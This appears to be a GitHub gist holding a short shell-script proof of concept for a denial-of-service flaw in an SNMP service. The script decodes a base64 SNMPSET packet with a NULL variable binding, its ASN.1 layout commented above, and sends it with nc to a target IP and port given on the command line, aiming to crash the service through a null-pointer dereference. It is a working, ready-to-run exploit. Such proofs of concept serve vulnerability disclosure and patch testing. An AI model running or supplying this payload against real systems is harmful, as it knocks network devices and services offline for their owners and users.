Skip to content

Instantly share code, notes, and snippets.

@menglong2234
Created October 31, 2022 04:23
Show Gist options
  • Save menglong2234/b7bc13ae1a144f47cc3c95a7ea062428 to your computer and use it in GitHub Desktop.
Save menglong2234/b7bc13ae1a144f47cc3c95a7ea062428 to your computer and use it in GitHub Desktop.
#!/bin/sh
############### PoC for SNMP DDoS vulnerability ###############
# null-pointer-ref during handle SNMP requeset
# craft an SNMPSET packet with NULL varlist data
#SEQUENCE (3 elem)
# INTEGER 1
# OCTET STRING (7 byte) private
# [3] (4 elem)
# INTEGER 1732466076
# INTEGER 0
# INTEGER 0
# SEQUENCE (1 elem)
# SEQUENCE (2 elem)
# OBJECT IDENTIFIER 1.3.6.1.2.1.4.2.0
# NULL
if [ "$#" -ne 2 ]; then
echo "Usage: ./snmp_ddos_ipttl.sh IP PORT"
fi
IP=$1
PORT=$2
echo "MCoCAQEEB3ByaXZhdGWjHAIEZ0NVnAIBAAIBADAOMAwGCCsGAQIBBAIABQA=" | base64 -d | nc -u $IP $PORT
exit 1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment